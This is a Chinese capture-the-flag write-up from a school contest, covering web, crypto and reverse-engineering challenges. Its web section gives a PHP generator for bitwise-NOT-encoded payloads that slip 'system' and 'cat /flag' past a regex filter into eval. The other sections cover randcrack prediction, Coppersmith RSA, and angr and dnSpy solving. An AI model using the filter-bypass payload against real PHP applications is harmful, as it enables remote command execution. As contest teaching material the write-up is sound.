6.4校赛wp
作者:互联网
校赛
能取得名次很开心,之后还要继续努力。遗憾的是misc没有解,还是要多花时间。
web
入门
f12查看源码在网络里找到flag即可
shell & shell_revenge
两道题一样的解法,看php代码是用正则表达式过滤了很多字符。找了些资料,了解到用取反就不会触发正则表达式,是ctfshow上的原题。使用如下PHP代码:
<?php
fwrite(STDOUT,'[+]your function: ');
$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
fwrite(STDOUT,'[+]your command: ');
$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
?>
命令行执行,先输入system,再用ls /查看,传参给eval,页面回显flag home,再输入命令 cat /flag,继续传参给eval即可获得flag
Crypto
贝斯手
题目暗示了是base家族,先后使用base64 32 long_to_bytes 85和58解密即可获得flag
from Crypto.Util.number import *
from base64 import *
import base58
cipher='R1EzVElOQlRHSTNVSU5aVUdRNERNTlpWR0UyREVOS0dHWTJES01aVUlZMkRHTkJSR1JCVE9OUlhHNDNFSU5CWUdSRERNUUpXR00yVElOQlNHUTNUTU1aV0dBMkRPTkJSR1laVE9OSldHQTNES01SV0dZMkRLTVJXSU0zRE9OSlFHVTRETVJCVUdRWlVHTVpVR1VaVE9SQlhJUTJETz09PQ=='
res=b64decode(cipher)
res=b32decode(res)
res=long_to_bytes(int(res,16))
res=b85decode(res)
res=base58.b58decode(res)
print(res)
flag:scuctf{M4ny_k1nds_0f_13a5e!}
crypto1
预测随机数,有现成的库可以用。要将312个64位数拆成624个32位数,因为32位输出顺序是abcd,而64位的顺序是badc,所以要反过来取,注意还要填充,脚本如下:
from Crypto.Util.number import *
from randcrack import RandCrack
from Crypto.Cipher import AES
f=open("./test",'rb')
rc=RandCrack()
for i in range(312):
a=int(f.readline())
a=bin(a)[2:].zfill(64)
c=int('0b'+a[:32],2)
b=int('0b'+a[32:],2)
rc.submit(c)
rc.submit(b)
f.close()
res=rc.predict_getrandbits(128)
key1=(long_to_bytes(res))
res=open('./out','rb').read()
aes1 = AES.new(key1, AES.MODE_CBC, b"\x00"*16)
flag=aes1.decrypt(res)
print(flag)
aes2 = AES.new(key2, AES.MODE_CBC, b"\x00"*16)
flag=aes2.decrypt(res)
print(flag)
flag:scuctf{af0sd_f8}
crypto2
简单的CopperSmith
p是512位的,x是128位,将x首元变为1。之后的条件就是p_是1019位,未知低128位,那么用CopperSmith Method即可解决。得到的p再在模n下和2^ex相乘即可得到真正的p。附上脚本:
'''sage
n = 85016144249518040150910227120120655178858680112497903474795846550337648959184474608344455198424753002209821827392389091448043545937173891641586356377876821641241033232828279439195610943286663032638048058568003136520988549470764306016674503217880123290623177055115638997384030786304744623796469032887028528817
e = 65537
c = 83724265903365973936178131138176403586796491037282811488797349096425411605088349291193550728134684573063610685342590513444340298881918101517014943046522979731970278182306111863948764449232289625176702192589838375986050458189860493609407060988207562417247647655585368569618561494059816502622854344519538215287
pbar = 4450463823628350893648746241337847373556196959762621885713665365237037340874488165755826348254697529157574566792939002187459776672801308978738078688091668148118673194644809701286264701999481650571431714684293423463355990167658855533422964048092514208406515703766237697665676941598677911363439038209842058509
kbits = 128
print("upper %d bits (of %d bits) is given" % (pbar.nbits()-kbits, pbar.nbits()))
PR.<x> = PolynomialRing(Zmod(n))
f = x + pbar
x0 = f.small_roots(X=2^kbits, beta=0.5)[0]
p = x0 + pbar
print(p)
'''
from Crypto.Util.number import *
import random
import gmpy2
from sympy import nextprime
leak=1145141920069
n= 85016144249518040150910227120120655178858680112497903474795846550337648959184474608344455198424753002209821827392389091448043545937173891641586356377876821641241033232828279439195610943286663032638048058568003136520988549470764306016674503217880123290623177055115638997384030786304744623796469032887028528817
c= 83724265903365973936178131138176403586796491037282811488797349096425411605088349291193550728134684573063610685342590513444340298881918101517014943046522979731970278182306111863948764449232289625176702192589838375986050458189860493609407060988207562417247647655585368569618561494059816502622854344519538215287
pbar=4450463823628350893648746241337847373556196959762621885713665365237037340874488165755826348254697529157574566792939002187459776672801308978738078688091668148118673194644809701286264701999481650571431714684293423463355990167658855533422964048092514208406515703766237697665676941598677911363439038209842058509
ex = 384
p_=4450463823628350893648746241337847373556196959762621885713665365237037340874488165755826348254697529157574566792939002187459776672801308978738078688091668148118673194644809701286264701999481650571431714684293423463355990167658855533422964048092514208406515703766237697896644308153471350247313227602240058029
p=p_*2**ex%n
q=n//p
phi=(p-1)*(q-1)
d=gmpy2.invert(65537,phi)
m=gmpy2.powmod(c,d,n)
print(long_to_bytes(m))
flag:scuctf{f05fe93d159b398fe25f280d94241261}
RE
ez_fps
Unity游戏,打开是个枪战游戏。DIE一查,PE64
把Managed文件夹里的Assembly-CSharp.dll扔到dnSpy64里面,马上发现现成flag
// Token: 0x0600003B RID: 59 RVA: 0x00003A20 File Offset: 0x00001C20
public static string TryGetFlag()
{
if (Flag.score >= 100)
{
return "scuctf{AK47_b4d_PP_Bizon_g00d}";
}
return Flag.score.ToString();
}
pixel
SMC
获取屏幕上位于401,401的像素点的色值,然后进行SMC
可以根据函数开头的
push ebp
mov ebp, esp
这种常见开头来作为线索,
反推出这个颜色值,然后直接就能输出flag了
0x61^0x55 = 0x34
0x8b^0xbb = 0x30
0xec^0xdd = 0x31
所以:
313034h
然后跑出结果
scuctf{pixel!pixel!pixel!}
rvm
ruby脚本,是个恶俗虚拟机
(肯定取材于ciscn)
a = '''
20041
20161
20276
20334
20458
20514
20605
20798
20839
20984
21064
21163
21269
21314
21452
21586
21613
21778
21875
21987
22080
22165
22279
22369
22476
22502
22676
'''
b = [41,61,76,34,58,14,5,98,39,84,64,63,69,14,52,86,13,78,75,87,80,65,79,69,76,2,76]
c = [93,88,52,69,67,98,135,24,89,56,196,84,123,143,90,223,76,201,206,36,43,201,7,14,203,124,212]
d = [b[i]^c[i] for i in range(27)]
e = [chr(d[i]-i-1) for i in range(27)]
for i in e:
print(i, end='')
#scuctf{ruby_1s_y0ur_fr13nd}
baby_maze
是个迷宫题,但是有点复杂,有100个迷宫函数,且里面添加了一大堆
push rax
rdrand rax
pop rax
这种没用的指令
反正二话不说,直接写jio本patch掉
然后开始用angr梭哈
下面是patch脚本
#!/usr/bin/env python
with open("baby_maze", "rb") as f:
binary = f.read()
list_binary = list(binary)
for i in range(len(binary)):
if binary[i] == 0x50:
if binary[i+1] == 0x48 and binary[i+2] == 0x0F and binary[i+3] == 0xC7 and binary[i+4] == 0xF0 :
if binary[i+5] == 0x58:
list_binary[i] = 0x90
list_binary[i+1] = 0x90
list_binary[i+2] = 0x90
list_binary[i+3] = 0x90
list_binary[i+4] = 0x90
list_binary[i+5] = 0x90
with open("baby_maze_altered", "wb") as ff:
ff.write(bytes(list_binary))
下面是angr一把梭
import angr
p=angr.Project("baby_maze")
ff = open("flag.txt", "w")
for i in range(0,100):
state=p.factory.blank_state(addr=0xa6aac+0x400000+i*0x16)
#state.stack_push(state.regs.rbp)
#state.regs.rbp = state.regs.rsp
sm=p.factory.simgr(state)
sm.explore(find=0xa6ace+0x400000+i*0x16)
if sm.found:
fs = sm.found[0]
print(fs.posix.dumps(0))
ff.write(fs.posix.dumps(0).decode())
#print(fs.posix.dumps(1))
else:
print("no")
ff.close()
标签:%#,v0,v1,flag,6.4,value,wp,print,校赛 来源: https://blog.csdn.net/shikaku_/article/details/117622087